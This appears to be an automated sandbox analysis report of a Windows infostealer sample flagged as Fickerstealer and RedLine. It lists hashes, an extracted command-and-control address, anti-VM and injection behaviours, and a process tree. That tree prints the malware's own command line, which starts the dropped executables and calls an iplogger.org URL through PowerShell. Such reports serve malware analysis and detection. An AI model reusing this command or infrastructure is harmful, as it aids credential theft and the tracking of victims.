Analysis
-
max time kernel
155s -
max time network
171s -
platform
windows7_x64 -
resource
win7-en-20211208 -
submitted
15-02-2022 12:04
Static task
static1
Behavioral task
behavioral1
Sample
7a9684f0e6059132d9d31d73e1ed3a5b36cfd50c27a73866afc17977708fa8ed.exe
Resource
win7-en-20211208
Behavioral task
behavioral2
Sample
7a9684f0e6059132d9d31d73e1ed3a5b36cfd50c27a73866afc17977708fa8ed.exe
Resource
win10v2004-en-20220112
General
-
Target
7a9684f0e6059132d9d31d73e1ed3a5b36cfd50c27a73866afc17977708fa8ed.exe
-
Size
3.0MB
-
MD5
c0786eaf915a205bb066e598e5418c6b
-
SHA1
8440f9408fa74c88fad34977ca1ac639c1f5ef2e
-
SHA256
7a9684f0e6059132d9d31d73e1ed3a5b36cfd50c27a73866afc17977708fa8ed
-
SHA512
4ecad942db3dc06da1c6c158e850eb7460bd4e3ba51e6abb304fec81cbd27aff475e9e3df37043de0dbc4f757b03a1588eb13c560a687c8d039a41bc6667c2c4
Malware Config
Extracted
fickerstealer
game2030.site:80
Signatures
-
Fickerstealer
Ficker is an infostealer written in Rust and ASM.
-
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
-
RedLine Payload 1 IoCs
Processes:
resource yara_rule behavioral1/memory/1148-80-0x0000000000BE0000-0x0000000001344000-memory.dmp family_redline -
.NET Reactor proctector 1 IoCs
Detects an executable protected by an unregistered version of Eziriz's .NET Reactor.
Processes:
resource yara_rule behavioral1/memory/1148-80-0x0000000000BE0000-0x0000000001344000-memory.dmp net_reactor -
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs
-
Executes dropped EXE 3 IoCs
Processes:
MMP1.exeWw.exeMMP1.exepid process 568 MMP1.exe 1148 Ww.exe 992 MMP1.exe -
Checks BIOS information in registry 2 TTPs 2 IoCs
BIOS information is often read in order to detect sandboxing environments.
Processes:
Ww.exedescription ioc process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion Ww.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion Ww.exe -
Loads dropped DLL 5 IoCs
Processes:
7a9684f0e6059132d9d31d73e1ed3a5b36cfd50c27a73866afc17977708fa8ed.execmd.exeMMP1.exepid process 1672 7a9684f0e6059132d9d31d73e1ed3a5b36cfd50c27a73866afc17977708fa8ed.exe 1408 cmd.exe 1408 cmd.exe 1408 cmd.exe 568 MMP1.exe -
Processes:
resource yara_rule \Users\Admin\AppData\Local\Temp\Ww.exe themida C:\Users\Admin\AppData\Local\Temp\Ww.exe themida C:\Users\Admin\AppData\Local\Temp\Ww.exe themida behavioral1/memory/1148-80-0x0000000000BE0000-0x0000000001344000-memory.dmp themida -
Processes:
Ww.exedescription ioc process Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA Ww.exe -
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
Processes:
flow ioc 4 api.ipify.org -
Suspicious use of NtSetInformationThreadHideFromDebugger 1 IoCs
Processes:
Ww.exepid process 1148 Ww.exe -
Suspicious use of SetThreadContext 1 IoCs
Processes:
MMP1.exedescription pid process target process PID 568 set thread context of 992 568 MMP1.exe MMP1.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Suspicious behavior: EnumeratesProcesses 2 IoCs
Processes:
Ww.exepowershell.exepid process 1148 Ww.exe 1784 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
Processes:
powershell.exedescription pid process Token: SeDebugPrivilege 1784 powershell.exe -
Suspicious use of WriteProcessMemory 36 IoCs
Processes:
7a9684f0e6059132d9d31d73e1ed3a5b36cfd50c27a73866afc17977708fa8ed.execmd.exeMMP1.exedescription pid process target process PID 1672 wrote to memory of 1408 1672 7a9684f0e6059132d9d31d73e1ed3a5b36cfd50c27a73866afc17977708fa8ed.exe cmd.exe PID 1672 wrote to memory of 1408 1672 7a9684f0e6059132d9d31d73e1ed3a5b36cfd50c27a73866afc17977708fa8ed.exe cmd.exe PID 1672 wrote to memory of 1408 1672 7a9684f0e6059132d9d31d73e1ed3a5b36cfd50c27a73866afc17977708fa8ed.exe cmd.exe PID 1672 wrote to memory of 1408 1672 7a9684f0e6059132d9d31d73e1ed3a5b36cfd50c27a73866afc17977708fa8ed.exe cmd.exe PID 1408 wrote to memory of 568 1408 cmd.exe MMP1.exe PID 1408 wrote to memory of 568 1408 cmd.exe MMP1.exe PID 1408 wrote to memory of 568 1408 cmd.exe MMP1.exe PID 1408 wrote to memory of 568 1408 cmd.exe MMP1.exe PID 1408 wrote to memory of 1148 1408 cmd.exe Ww.exe PID 1408 wrote to memory of 1148 1408 cmd.exe Ww.exe PID 1408 wrote to memory of 1148 1408 cmd.exe Ww.exe PID 1408 wrote to memory of 1148 1408 cmd.exe Ww.exe PID 1408 wrote to memory of 1784 1408 cmd.exe powershell.exe PID 1408 wrote to memory of 1784 1408 cmd.exe powershell.exe PID 1408 wrote to memory of 1784 1408 cmd.exe powershell.exe PID 1408 wrote to memory of 1784 1408 cmd.exe powershell.exe PID 568 wrote to memory of 992 568 MMP1.exe MMP1.exe PID 568 wrote to memory of 992 568 MMP1.exe MMP1.exe PID 568 wrote to memory of 992 568 MMP1.exe MMP1.exe PID 568 wrote to memory of 992 568 MMP1.exe MMP1.exe PID 568 wrote to memory of 992 568 MMP1.exe MMP1.exe PID 568 wrote to memory of 992 568 MMP1.exe MMP1.exe PID 568 wrote to memory of 992 568 MMP1.exe MMP1.exe PID 568 wrote to memory of 992 568 MMP1.exe MMP1.exe PID 568 wrote to memory of 992 568 MMP1.exe MMP1.exe PID 568 wrote to memory of 992 568 MMP1.exe MMP1.exe PID 568 wrote to memory of 992 568 MMP1.exe MMP1.exe PID 568 wrote to memory of 992 568 MMP1.exe MMP1.exe PID 568 wrote to memory of 992 568 MMP1.exe MMP1.exe PID 568 wrote to memory of 992 568 MMP1.exe MMP1.exe PID 568 wrote to memory of 992 568 MMP1.exe MMP1.exe PID 568 wrote to memory of 992 568 MMP1.exe MMP1.exe PID 568 wrote to memory of 992 568 MMP1.exe MMP1.exe PID 568 wrote to memory of 992 568 MMP1.exe MMP1.exe PID 568 wrote to memory of 992 568 MMP1.exe MMP1.exe PID 568 wrote to memory of 992 568 MMP1.exe MMP1.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\7a9684f0e6059132d9d31d73e1ed3a5b36cfd50c27a73866afc17977708fa8ed.exe"C:\Users\Admin\AppData\Local\Temp\7a9684f0e6059132d9d31d73e1ed3a5b36cfd50c27a73866afc17977708fa8ed.exe"1⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exe"cmd" /c start "" "MMP1.exe" & start "" "Ww.exe" & powershell -command "Invoke-WebRequest -Uri https://iplogger.org/1BHHn7"2⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\MMP1.exe"MMP1.exe"3⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\MMP1.exe"MMP1.exe"4⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\Ww.exe"Ww.exe"3⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -command "Invoke-WebRequest -Uri https://iplogger.org/1BHHn7"3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\Temp\MMP1.exeMD5
5ca7fa3d1d1efdffada437068eccbd4e
SHA10204b4435a79e1d3ce325706801ba3687e86dccf
SHA2568eb80516c235524eac32db0f1ff1aa1a327ebe6ce1d2ec3f259c9358cda6e80b
SHA51215ace6e0f384fb4f228faf49942aeced299200807a00829c8530fa1bc0408ee2de8a44a07dd9e823b7f90dd06dbeddda4934ecf4f0083173f8648c3833f8c13d
-
C:\Users\Admin\AppData\Local\Temp\MMP1.exeMD5
5ca7fa3d1d1efdffada437068eccbd4e
SHA10204b4435a79e1d3ce325706801ba3687e86dccf
SHA2568eb80516c235524eac32db0f1ff1aa1a327ebe6ce1d2ec3f259c9358cda6e80b
SHA51215ace6e0f384fb4f228faf49942aeced299200807a00829c8530fa1bc0408ee2de8a44a07dd9e823b7f90dd06dbeddda4934ecf4f0083173f8648c3833f8c13d
-
C:\Users\Admin\AppData\Local\Temp\MMP1.exeMD5
5ca7fa3d1d1efdffada437068eccbd4e
SHA10204b4435a79e1d3ce325706801ba3687e86dccf
SHA2568eb80516c235524eac32db0f1ff1aa1a327ebe6ce1d2ec3f259c9358cda6e80b
SHA51215ace6e0f384fb4f228faf49942aeced299200807a00829c8530fa1bc0408ee2de8a44a07dd9e823b7f90dd06dbeddda4934ecf4f0083173f8648c3833f8c13d
-
C:\Users\Admin\AppData\Local\Temp\Ww.exeMD5
e58d740f792702828c45ebfb73c8a95d
SHA18eeb2a9357aa57affb56cc938342d3dd7bb6f0c9
SHA256ebc182b1f61f415d16d1a6b43c3250f290633b1a297916911166a078c80ddd10
SHA5129152981670830fcc732464c4e21dc7d1af9cd6d8856601782a6166a2b81f031a2c6463fc89fdbd760bfb207861725587d80f872785441ab69d108758c9c5a8f8
-
C:\Users\Admin\AppData\Local\Temp\Ww.exeMD5
e58d740f792702828c45ebfb73c8a95d
SHA18eeb2a9357aa57affb56cc938342d3dd7bb6f0c9
SHA256ebc182b1f61f415d16d1a6b43c3250f290633b1a297916911166a078c80ddd10
SHA5129152981670830fcc732464c4e21dc7d1af9cd6d8856601782a6166a2b81f031a2c6463fc89fdbd760bfb207861725587d80f872785441ab69d108758c9c5a8f8
-
\Users\Admin\AppData\Local\Temp\MMP1.exeMD5
5ca7fa3d1d1efdffada437068eccbd4e
SHA10204b4435a79e1d3ce325706801ba3687e86dccf
SHA2568eb80516c235524eac32db0f1ff1aa1a327ebe6ce1d2ec3f259c9358cda6e80b
SHA51215ace6e0f384fb4f228faf49942aeced299200807a00829c8530fa1bc0408ee2de8a44a07dd9e823b7f90dd06dbeddda4934ecf4f0083173f8648c3833f8c13d
-
\Users\Admin\AppData\Local\Temp\MMP1.exeMD5
5ca7fa3d1d1efdffada437068eccbd4e
SHA10204b4435a79e1d3ce325706801ba3687e86dccf
SHA2568eb80516c235524eac32db0f1ff1aa1a327ebe6ce1d2ec3f259c9358cda6e80b
SHA51215ace6e0f384fb4f228faf49942aeced299200807a00829c8530fa1bc0408ee2de8a44a07dd9e823b7f90dd06dbeddda4934ecf4f0083173f8648c3833f8c13d
-
\Users\Admin\AppData\Local\Temp\MMP1.exeMD5
5ca7fa3d1d1efdffada437068eccbd4e
SHA10204b4435a79e1d3ce325706801ba3687e86dccf
SHA2568eb80516c235524eac32db0f1ff1aa1a327ebe6ce1d2ec3f259c9358cda6e80b
SHA51215ace6e0f384fb4f228faf49942aeced299200807a00829c8530fa1bc0408ee2de8a44a07dd9e823b7f90dd06dbeddda4934ecf4f0083173f8648c3833f8c13d
-
\Users\Admin\AppData\Local\Temp\Ww.exeMD5
e58d740f792702828c45ebfb73c8a95d
SHA18eeb2a9357aa57affb56cc938342d3dd7bb6f0c9
SHA256ebc182b1f61f415d16d1a6b43c3250f290633b1a297916911166a078c80ddd10
SHA5129152981670830fcc732464c4e21dc7d1af9cd6d8856601782a6166a2b81f031a2c6463fc89fdbd760bfb207861725587d80f872785441ab69d108758c9c5a8f8
-
\Users\Admin\AppData\Local\Temp\nst2A0E.tmp\JHILLSVZFH1MBP.dllMD5
293165db1e46070410b4209519e67494
SHA1777b96a4f74b6c34d43a4e7c7e656757d1c97f01
SHA25649b7477db8dd22f8cf2d41ee2d79ce57797f02e8c7b9e799951a6c710384349a
SHA51297012139f2da5868fe8731c0b0bcb3cfda29ed10c2e6e2336b504480c9cd9fb8f4728cca23f1e0bd577d75daa542e59f94d1d341f4e8aaeebc7134bf61288c19
-
memory/568-75-0x000000000245B000-0x0000000002483000-memory.dmpFilesize
160KB
-
memory/568-71-0x000000000245B000-0x0000000002483000-memory.dmpFilesize
160KB
-
memory/568-76-0x00000000002B0000-0x00000000002F7000-memory.dmpFilesize
284KB
-
memory/992-73-0x0000000000400000-0x000000000044F000-memory.dmpFilesize
316KB
-
memory/992-77-0x0000000000400000-0x000000000044F000-memory.dmpFilesize
316KB
-
memory/1148-67-0x0000000077061000-0x0000000077062000-memory.dmpFilesize
4KB
-
memory/1148-66-0x000000007738E000-0x000000007738F000-memory.dmpFilesize
4KB
-
memory/1148-65-0x0000000077064000-0x0000000077065000-memory.dmpFilesize
4KB
-
memory/1148-70-0x0000000077820000-0x0000000077822000-memory.dmpFilesize
8KB
-
memory/1148-79-0x00000000740CE000-0x00000000740CF000-memory.dmpFilesize
4KB
-
memory/1148-80-0x0000000000BE0000-0x0000000001344000-memory.dmpFilesize
7.4MB
-
memory/1148-86-0x00000000054B0000-0x00000000054B1000-memory.dmpFilesize
4KB
-
memory/1672-55-0x0000000075321000-0x0000000075323000-memory.dmpFilesize
8KB
-
memory/1784-81-0x0000000072081000-0x0000000072082000-memory.dmpFilesize
4KB
-
memory/1784-82-0x0000000002650000-0x0000000002651000-memory.dmpFilesize
4KB
-
memory/1784-83-0x0000000072082000-0x0000000072084000-memory.dmpFilesize
8KB
-
memory/1784-84-0x0000000002651000-0x0000000002652000-memory.dmpFilesize
4KB
-
memory/1784-85-0x0000000002652000-0x0000000002654000-memory.dmpFilesize
8KB